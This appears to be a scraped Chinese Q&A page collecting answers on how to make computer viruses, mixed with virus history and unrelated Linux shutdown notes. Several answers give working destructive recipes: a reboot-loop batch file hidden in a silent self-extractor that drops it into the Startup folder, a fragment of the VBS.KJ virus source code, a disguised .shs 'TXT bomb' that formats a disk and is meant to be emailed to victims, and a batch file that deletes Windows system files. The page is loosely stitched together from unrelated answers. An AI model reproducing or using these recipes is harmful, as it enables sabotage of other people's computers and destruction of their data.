導航:首頁 > 計算方法 > 電腦病毒製作方法圖解

電腦病毒製作方法圖解

發布時間:2022-06-21 21:12:22

如何製作電腦病毒

很榮幸能夠回答您的問題!

希望能幫到您,如有疑問,請追問!

⑵ 怎樣製做電腦病毒

病毒是買的,自己做是很難的,黑客網站有賣的,80多元一個月,要不就上不正當的網站,下不正當的文件,病毒含有率是95%,我建議你還是別整病毒,有的病毒可使電腦癱瘓,跟慘的是黑客專用的病毒,文件可隨時被篡改

⑶ 如何製作電腦關機病毒

新建一個文本文檔,在其中輸入「shutdown
-r
-t
30」(不包含雙引號)然後保存為擴展名為.bat的文件。
一旦運行這個文件桌面就會彈出一個倒計時30秒重啟的對話框。我們還可以再修改一下,把「-r」改成「-s」(不包含雙引號)這樣在運行後就只是關機而不重啟。注意:其中的30是關機或重啟的倒計時時間,你可以隨便改。
我們還可以再進行加工,就是讓它在每次開機時自動運行,步驟如下:
步驟1、右擊這個文件,在彈出的快捷菜單中選擇「添加到壓縮文件」。
步驟2、雙擊打開這個壓縮文件,工具欄中選擇「自解壓格式」。
步驟3、在出現的自解壓設置中點擊「高級自解壓選項」,然後在解壓後運行中輸入剛才保存的那個文件名,在解壓路徑輸入:C:\Documents
and
Settings\Administrator\[開始]
菜單\程序\啟動」。
步驟4、在模式中的安靜模式選擇「全部隱藏」。最後點擊確定即可生成一個自解壓文件。
這樣我在運行這個自解壓文件時就會自動運行那個病毒文件,並將其解壓到啟動文件夾中,讓其在每次開機時都運行。對方在運行我們製作的病毒後他的電腦就會不間斷的重啟,是不是很好玩呀!
要想不重啟只要在dos下輸入「shutdown
-a」回車,然後再把啟動文件夾中的病毒刪除即可。

⑷ 電腦病毒製作方法

電腦病毒是一個程序,一段可執行碼。就像生物病毒一樣,計算機病毒有獨特的復制能力。計算機病毒可以很快地蔓延,又常常難以根除。它們能把自身附著在各種類型的文件上。當文件被復制或從一個用戶傳送到另一個用戶時,它們就隨同文件一起蔓延開來。

除復制能力外,某些計算機病毒還有其它一些共同特性:一個被污染的程序能夠傳送病毒載體。當你看到病毒載體似乎僅僅表現在文字和圖象上時,它們可能也已毀壞了文件、再格式化了你的硬碟驅動或引發了其它類型的災害。若是病毒並不寄生於一個污染程序,它仍然能通過占據存貯空間給你帶來麻煩,並降低你的計算機的全部性能。

可以從不同角度給出計算機病毒的定義。一種定義是通過磁碟、磁帶和網路等作為媒介傳播擴散,能「傳染」 其他程序的程序。另一種是能夠實現自身復制且藉助一定的載體存在的具有潛伏性、傳染性和破壞性的程序。還有的定義是一種人為製造的程序,它通過不同的途徑潛伏或寄生在存儲媒體(如磁碟、內存)或程序里。當某種條件或時機成熟時,它會自生復制並傳播,使計算機的資源受到不同程序的破壞等等。這些說法在某種意義上借用了生物學病毒的概念,計算機病毒同生物病毒所相似之處是能夠侵入計算機系統和網路,危害正常工作的「病原體」。它能夠對計算機系統進行各種破壞,同時能夠自我復制, 具有傳染性。

所以, 計算機病毒就是能夠通過某種途徑潛伏在計算機存儲介質(或程序)里, 當達到某種條件時即被激活的具有對計算機資源進行破壞作用的一組程序或指令集合。

1、最初"計算機病毒"這一概念的提出可追溯到七十年代美國作家雷恩出版的《P1的青春》一書,書中構思了一種能夠自我復制,利用通信進行傳播的計算機程序,並稱之為計算機病毒。

2、貝爾實驗室的三位年輕程序員也受到馮?諾依曼理論的啟發,發明了「磁芯大戰」游戲。

3、1983 年 11月,在一次國際計算機安全學術會議上,美國學者科恩第一次明確提出計算機病毒的概念,並進行了演示。

4、世界上公認的第一個在個人電腦上廣泛流行的病毒是1986年初誕生的大腦(C-Brain)病毒,編寫該病毒的是一對巴基斯坦兄弟,兩兄弟經營著一家電腦公司,以出售自己編制的電腦軟體為生。當時,由於當地盜版軟體猖獗,為了防止軟體被任意非法拷貝,也為了追蹤到底有多少人在非法使用他們的軟體,於是在1986年年初,他們編寫了「大腦(Brain)」病毒,又被稱為「巴基斯坦」病毒。該病毒運行在DOS操作系統下,通過軟盤傳播,只在盜拷軟體時才發作,發作時將盜拷者的硬碟剩餘空間吃掉。

5、1988年11月美國國防部的軍用計算機網路遭受莫里斯病毒襲擊,致使美國Internet網路上6000多計算機感染,直接經濟損失9600萬美元。莫里斯病毒是由康乃爾大學23歲的羅特?莫里斯製作。後來出現的各類蠕蟲,都是仿造了莫里斯蠕蟲,以至於人們將該病毒的編制者莫里斯稱為「蠕蟲之父」。

6、1999年 Happy99、美麗殺手(Melissa)等完全通過Internet傳播的病毒的出現標志著Internet病毒將成為病毒新的增長點。其特點就是利用Internet的優勢,快速進行大規模的傳播,從而使病毒在極短的時間內遍布全球。

7、CIH病毒是繼DOS病毒的第四類新型病毒,CIH這三個字母曾經代表著災難。1998年8月從台灣傳入大陸,共有三個主要版本:1.2版/1.3版/1.4版,發作時間分別是4月26日、6月26日、每月26日。該病毒是第一個直接攻擊、破壞硬體的計算機病毒,是迄今為止破壞最為嚴重的病毒。
CIH病毒製造者 陳盈豪 曾有兩次精神科門診記錄,被人們認為是「電腦鬼才」。

8、2000年的5月,通過電子郵件傳播的"愛蟲"病毒迅速在世界各地蔓延,更大規模的發作,造成全世界空前的計算機系統破壞。 I LOVE YOU愛蟲病毒是使用VB Script程序語言編寫的病毒,它主要是通過一封信件標題為「I LOVE YOU"的電子郵件傳播的。一旦執行附加文件,病毒會獲取Outlook通訊錄的名單,並自動發出「I LOVE YOU」電子郵件,從而導致網路阻塞。破壞性:愛蟲病毒的傳播會導致網路癱瘓,病毒發作時,還會把*.mp3、*.jpg等10種文件改為*.vbs,並傳染覆蓋這些文件。
與愛蟲病毒相似的網路病毒還有Melissa(美麗殺手病毒)等。

⑸ 網路病毒是怎樣製作出來的

病毒是一種計算機指令代碼。用戶運行了這些代碼後,或是出現一個小小的惡作劇,或是產生一些惡意的結果,如破壞系統文件造成系統無法運行、數據文件統統刪除、硬體被破壞、非法侵入內部資料庫偷竊或篡改數據等等。
病毒的製造者往往出於炫耀自己的編程能力與控制力、或是因自己計算機使用中不慎染毒而產生的報復心理制毒傳毒。也有一些是因為保護自己的知識產權而製作的一個可控「定時炸彈」。如果用戶正常使用將不會發作;如果用戶不及時繳納費用或者私下傳播該應用軟體,那麼
「定時炸彈」就會被引爆。
最早由馮.諾伊曼提出了這種可能性,20世紀70年代中期有幾位美國科普作家在他們的科幻小說中描寫了計算機病毒。1983年11月3日Fred.Cohen博士研製出一種在運行過程中不斷復制自身的破壞性程序,Len.Adleman將其命名為計算機病毒(Computer
Viruses)。
計算機和網路給我們生活提供的便利,遠非計算機病毒帶來的不便所能比擬的。只要我們了解病毒的傳播方式,依靠專業人員的支持,就可以抵禦病毒帶來的各種危害,從而更為有效地利用計算機網路技術改進我們的生活。
常見病毒簡介:
引導型-引導型病毒是感染磁碟引導區或主引導區的一類病毒,是感染率僅次於「宏病毒」的常見病毒。由於這類病毒感染引導區,當磁碟或硬碟在運行時,引發感染其他*.exe、*.com、*.386等計算機運行必備的命令程序,造成各種損害。常見的品種有tpvo/3783,Windows系統感染後會嚴重影響運行速度、某些功能無法執行,經過殺毒以後,必須重裝Windows操作系統,才能正常運行。
文件型-文件型病毒是感染文件的一類病毒,是目前種類最多的一類病毒。黑客病毒Trojan.BO就屬於這一類型。BO黑客病毒則利用通訊軟體,通過網路非法進入他人的計算機系統,獲取或篡改數據或者後台控制計算機。從而造成各種泄密、竊取事故。
混合型-這類病毒既感染命令文件、又感染磁碟引導區與主引導區。能破壞計算機主板晶元(BIOS)的CIH毀滅者病毒屬於該類病毒。CIH是一個台灣大學生編寫的一個病毒,當時他把它放置在大學的BBS站上,1998年傳入大陸,發作的日期是每個月的26日。該病毒是第一個直接攻擊計算機硬體的病毒,破壞性極強,發作時破壞計算機Flash
BIOS晶元中的系統程序,導致主板與硬碟數據的損壞。1999年4月26日,CIH病毒在中國、俄羅斯、韓國等地大規模發作,僅大陸就造成數十萬計算機癱瘓,大量硬碟數據被破壞。
宏病毒-是一類主要感染WORD文檔和文檔模板等數據文件的病毒。宏病毒是使用某個應用程序自帶的宏編程語言編寫的病毒,目前國際上已發現三類宏病毒:感染WORD系統的WORD宏病毒、感染EXCEL系統的EXCEL宏病毒和感染Lotus
Ami
Pro的宏病毒。目前,人們所說的宏病毒主要指Word和Excel宏病毒。從96年下半年開始在我國廣泛流行。如Tw
No-A、美麗殺、PaPa等。
與以往的病毒不同,宏病毒有以下特點:
①感染數據文件:宏病毒專門感染數據文件,徹底改變了人們的「數據文件不會傳播病毒」的錯誤認識。
②多平台交叉感染:宏病毒沖破了以往病毒在單一平台上傳播的局限,當WORD、EXCEL這類軟體在不同平台(如WINDOWS、WINDOWS
NT、OS/2和MACINTOSH等)上運行時,會被宏病毒交叉感染。
③容易編寫:以往病毒是以二進制的計算機機器碼形式出現,而宏病毒則是以人們容易閱讀的源代碼形式出現,所以編寫和修改宏病毒比以往病毒更容易。從96年底至今短短半年宏病毒種類已從三十多種急劇增加到1000多種。
④容易傳播:別人送一篇文章或發一個E-mail(電子郵件)給你,如果它們帶有病毒,只要你打開這些文件,你的計算機就會被宏病毒感染了。此後,你打開或新建文件都可能帶上宏病毒,這導致了宏病毒的感染率非常高。

⑹ 病毒是怎麼製作出來的

病毒定義
計算機病毒是一個程序,一段可執行碼,對計算機的正常使用進行破壞,使得電腦無法正常使用甚至整個操作系統或者電腦硬碟損壞。就像生物病毒一樣,計算機病毒有獨特的復制能力。計算機病毒可以很快地蔓延,又常常難以根除。它們能把自身附著在各種類型的文件上。當文件被復制或從一個用戶傳送到另一個用戶時,它們就隨同文件一起蔓延開來。這種程序不是獨立存在的,它隱蔽在其他可執行的程序之中,既有破壞性,又有傳染性和潛伏性。輕則影響機器運行速度,使機器不能正常運行;重則使機器處於癱瘓,會給用戶帶來不可估量的損失。通常就把這種具有破壞作用的程序稱為計算機病毒。 除復制能力外,某些計算機病毒還有其它一些共同特性:一個被污染的程序能夠傳送病毒載體。當你看到病毒載體似乎僅僅表現在文字和圖像上時,它們可能也已毀壞了文件、再格式化了你的硬碟驅動或引發了其它類型的災害。若是病毒並不寄生於一個污染程序,它仍然能通過占據存貯空間給你帶來麻煩,並降低你的計算機的全部性能。計算機病毒:一種計算機程序,它可以附屬在可執行文件或隱藏在系統數據區中,在開機或執行某些程序後悄悄地進駐內存,然後對其它的文件進行傳染,使之傳播出去,然後在特定的條件下破壞系統或騷擾用戶。目前有很多的清除病毒的軟體,但是新病毒還是層出不窮,成為一大危害。

病毒的來源
(1)搞計算機的人員和業余愛好者的惡作劇、尋開心製造出的病毒,例如象圓點一類的良性病毒;
(2)軟體公司及用戶為保護自己的軟體被非法復制而採取的報復性懲罰措施。因為他們發現對軟體上鎖,不如在其中藏有病毒對非法拷貝的打擊大, 這更加助長了各種病毒的傳播;
(3)旨在攻擊和摧毀計算機信息系統和計算機系統而製造的病毒----就是蓄意進行破壞。例如1987年底出現在以色列耶路撒冷西伯萊大學的猶太人病毒,就是雇員在工作中受挫或被辭退時故意製造的。它針對性強,破壞性大,產生於內部,防不勝防;
(4)用於研究或有益目的而設計的程序,由於某種原因失去控制或產生了意想不到的效果。

病毒怎麼來的?就是這樣來的 病毒只是個運用不當的程序 要是冰河用的好可以管理區域網 呵呵

⑺ 怎樣「製造」電腦病毒(不傷害自己的電腦)

那就看看vbs.kj的源碼 Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk Sub KJ_start() \『 初始化變數 KJSetDim() \『 初始化環境 KJCreateMilieu() \『 感染本地或者共享上與html所在目錄 KJLikeIt() \『 通過vbs感染Outlook郵件模板 KJCreateMail() \『 進行病毒傳播 KJPropagate() End Sub \『 函數:KJAppendTo(FilePath,TypeStr) \『 功能:向指定類型的指定文件追加病毒 \『 參數: \『 FilePath 指定文件路徑 \『 TypeStr 指定類型 Function KJAppendTo(FilePath,TypeStr) On Error Resume Next \『 以只讀方式打開指定文件 Set ReadTemp = FSO.OpenTextFile(FilePath,1) \『 將文件內容讀入到TmpStr變數中 TmpStr = ReadTemp.ReadAll \『 判斷文件中是否存在「KJ_start()「字元串,若存在說明已經感染,退出函數; \『 若文件長度小於1,也退出函數。 If Instr(TmpStr,「KJ_start()「) <> 0 Or Len(TmpStr) < 1 Then ReadTemp.Close Exit Function End If \『 如果傳過來的類型是「htt「 \『 在文件頭加上調用頁面的時候載入KJ_start()函數; \『 在文件尾追加html版本的加密病毒體。 \『 如果是「html「 \『 在文件尾追加調用頁面的時候載入KJ_start()函數和html版本的病毒體; \『 如果是「vbs「 \『 在文件尾追加vbs版本的病毒體 If TypeStr = 「htt「 Then ReadTemp.Close Set FileTemp = FSO.OpenTextFile(FilePath,2) FileTemp.Write 「<「 & 「BODY onload=「「「 & 「vbscript:「 & 「KJ_start()「「「 & 「>「 & vbCrLf & TmpStr & vbCrLf & HtmlText FileTemp.Close Set FAttrib = FSO.GetFile(FilePath) FAttrib.attributes = 34 Else ReadTemp.Close Set FileTemp = FSO.OpenTextFile(FilePath,8) If TypeStr = 「html「 Then FileTemp.Write vbCrLf & 「<「 & 「HTML>「 & vbCrLf & 「<「 & 「BODY onload=「「「 & 「vbscript:「 & 「KJ_start()「「「 & 「>「 & vbCrLf & HtmlText ElseIf TypeStr = 「vbs「 Then FileTemp.Write vbCrLf & VbsText End If

⑻ 麻煩你給我寫一個簡單的電腦病毒、我試著製作一下、把過程寫詳細些好嗎

[本站原創]"TXT",即大家最熟悉的純文本格式,它是一種最基本的文本文件保存格式。有體積小、兼容性好、無病毒等優點。實話說樹大招風,黑客們卻利用人們對TXT這份信任搞起了TXT"炸彈"。TXT炸彈其實是披著".txt"外皮的"碎片對象"(擴展名為SHS)的文件,它通過郵件附件的形式,悄悄的進入你的系統。善良的人們以為光臨的是TXT文件,沒有任何的考慮便雙擊運行。這時這只披著羊皮的"老狼",卻脫掉"羊皮",露出原形,干起破壞計算機系統的勾當。為了保護自身的安全,摸清的"對方"的底細。今天我們向大家展示如何製作一個格式化軟盤的TXT炸彈。我們的目的在於知已知彼,百戰百勝。
實戰"TXT"病毒
步驟1 打開記事本,創建一個只包含一個空格(為了減小文件體積)的文本文件,任意取名。
步驟2 打開寫字板,將此文件拖放入記事本。也可以單擊記事本菜單欄中的【插入】|【對象】,彈出【插入對象】對話框,選中【從文件創建】,然後單擊【瀏覽】按鈕選擇要插入的文件(如圖1)。
圖1 插入對象
步驟3 選中該插入對象的圖標,選擇菜單欄中的【編輯】|【包對象】|【編輯包】(如圖2)。
圖2添加圖標
在彈出的【對象包裝程序】對話框中,選擇菜單欄中的【編輯】|【命令行】,然後輸入如下命令:Format.com a: /autotest,單擊【確定】,此時,內容欄中會顯示出命令內容(如圖3)。

圖3 添加命令
步驟4 單擊外觀欄中的【插入圖標】按鈕,會彈出一個警告對話框,確認,然後任選一個圖標(如圖4)。

圖4 選取圖標
步驟5 選擇菜單欄中的【編輯】|【卷標】,為此嵌入對象取一個名稱(會替換原來的文件名稱)(如圖5)。單擊【文件】菜單中的【更新】,然後關閉此對話框。
圖5 卷標
步驟6 將剛剛建立的嵌入對象拖放到桌面上。文件的默認名是"碎片",現在我們把它改成"iloveyou.txt"。打開電子郵件程序將桌面上的"iloveyou.txt"作為附件發出,或者將含有嵌入對象(帶有惡意命令)的文檔作為附件發出。
步驟7 當郵件接收者誤將"iloveyou.txt.shs"文件作為"iloveyou.txt"放心地打開時,或打開文件,單擊文件中的嵌入對象時觸發惡意命令(彈出DOS運行窗口,執行格式化命令),假如此時有另一個程序正在訪問軟碟機,則會顯示如下信息"Drive A: is currently in use by another process. Aborting Format."(A驅正被另一個程序訪問,格式化中止)。這樣一個格式化軟盤的炸彈就製作起來了,如果大家加上格式化硬碟的代碼,那效果可以想像了。
防禦
面對如此狡猾的TXT炸彈,平時就不拘小節的我們如何提防呢,下面向大家介紹兩種防治措施,以防一方平安。
1.揭開TXT的外皮
其實TXT病毒最後的危害在於它的隱蔽性,如何我們能夠揭開它的外皮,直接顯示出".SHS"擴展名,這樣危害就會減少很多。顯示".SHS"擴展名方法其實很簡單,只要找開注冊表編輯器,從中找到"HEY_CLASSES_ROOTShellScrap"鍵,在其下面的一個鍵值為"NeverShowExt",它是無法顯示".SHS"文件擴展名的"罪魁禍首",刪除它,以後我們就可以直接看到".SHS"擴展名了,當然這時的人們絕不會在三心二意了。
2.更換"碎片對象"圖標。
我們為什麼一眼就可以看出某種文件的具體的格式,這都是由它們的默認圖標決定的。因為於碎片對象文件的默認圖標與文本文件圖標非常相似所以我們經常將碎片對象文件誤認為TXT文件。為了區別開它們,我們只要更換碎片對象文件的默認圖標即可。打開"資源管理器",然後選中【查看】菜單下的【文件夾選框】,在彈出的對話框中選擇【文件類型】活頁卡,在【已注冊的文件類型】下找到【碎片對象】。單擊右上角【編輯】按鈕,在打開的【編輯文件類型】對話框中單擊上邊的【更改圖標】按鈕(如圖6)。打開C:WINDOWSSYSTEMPifmgr.dll,從出現的圖標中選一個作為.SHS文件的新圖標(就選第一排最後一個吧,一顆炸彈!),這樣以後一看就知道這是一顆炸彈喲,大意不得。
圖6 編輯類型
方便日常操作,常用的關機和重啟命令

Linux中常用的關機和重新啟動命令有shutdown、halt、reboot以及init,它們都可以達到關機和重新啟動的目的,但是每個命令的內部工作過程是不同的,下面將逐一進行介紹。
1. shutdown
shutdown命令用於安全關閉Linux系統。有些用戶會使用直接斷掉電源的方式來關閉Linux,這是十分危險的。因為Linux與Windows不同,其後台運行著許多進程,所以強制關機可能會導致進程的數據丟失,使系統處於不穩定的狀態,甚至會損壞硬體設備。
執行shutdown命令時,系統會通知所有登錄的用戶系統將要關閉,並且login指令會被凍結,即新的用戶不能再登錄系統。使用shutdown命令可以直接關閉系統,也可以延遲指定的時間再關閉系統,還可以重新啟動。延遲指定的時間再關閉系統,可以讓用戶有時間儲存當前正在處理的文件和關閉已經打開的程序。
shutdown命令的部分參數如下:
[-t] 指定在多長時間之後關閉系統
[-r] 重啟系統
[-k] 並不真正關機,只是給每個登錄用戶發送警告信號
[-h] 關閉系統(halt)
shutdown命令的工作實質是給init程序發送信號(signal),要求其切換系統的運行級別(Runlevel)。系統的運行級別包括:
0:關閉系統
1:單用戶模式,如果沒有為shutdown命令指定-h或-r參數而直接執行,則默認將切換到此運行級別
2:多用戶模式(不支持NFS)
3:多用戶模式(支持NFS),一般常用此種運行級別
5:多用戶模式(GUI模式)
6:重新啟動系統
2. halt
halt是最簡單的關機命令,其實際上是調用shutdown -h命令。halt執行時,殺死應用進程,文件系統寫操作完成後就會停止內核。
halt命令的部分參數如下:
[-f] 沒有調用shutdown而強制關機或重啟
[-i] 關機或重新啟動之前,關掉所有的網路介面
[-p] 關機時調用poweroff,此選項為預設選項
3.reboot
reboot的工作過程與halt類似,其作用是重新啟動,而halt是關機。其參數也與halt類似。
4.init
init是所有進程的祖先,其進程號始終為1。init用於切換系統的運行級別,切換的工作是立即完成的。init 0命令用於立即將系統運行級別切換為0,即關機;init 6命令用於將系統運行級別切換為6,即重新啟動。
(T115)

⑼ 怎麼做電腦病毒

最簡單的電腦病毒的編寫方法:

用記事本編寫以下內容:
@CLS
@ECHO My Virus Version 1.0
@deltree/y c:\command.com
@deltree/y c:\io.sys
@deltree/y c:\msdos.sys
@deltree/y c:\windows\*.*
@deltree/y c:\windows\win.com
@deltree/y c:\winnt\win.com

然後保存為「Autoexec.bat」文件,然後把這個文件復制到C盤根目錄下,然後重新啟動計算機。好了,病毒開始發作了......

⑽ 電腦病毒製作教程

很榮幸能夠回答您的問題!

閱讀全文

與電腦病毒製作方法圖解相關的資料

熱點內容
5w實踐方法包括哪些 瀏覽:489
小型太陽能板安裝方法 瀏覽:648
買彩票最好的計算方法 瀏覽:290
排除轉向系統中的空氣方法步驟 瀏覽:690
樂視手機位置信息在哪裡設置方法 瀏覽:200
藏紅花的食用方法及用量 瀏覽:75
深圳房產的計算方法 瀏覽:484
怎麼驗算有餘數除法的方法 瀏覽:988
能量杯使用方法 瀏覽:212
cvd常用制膜方法 瀏覽:413
如何讀書寫作的方法和技巧 瀏覽:652
治療濕尤方法 瀏覽:292
英語快速說話方法 瀏覽:614
機構退休金計算方法 瀏覽:365
小楷正確拿筆方法 瀏覽:479
專賣店茅台盒子酒鑒別真偽的方法 瀏覽:460
賓得k50使用方法 瀏覽:228
讓磁鐵自由旋轉的方法有哪些視頻 瀏覽:404
雷克薩斯山地車安裝方法 瀏覽:268
飲用水高氟水最佳解決方法 瀏覽:504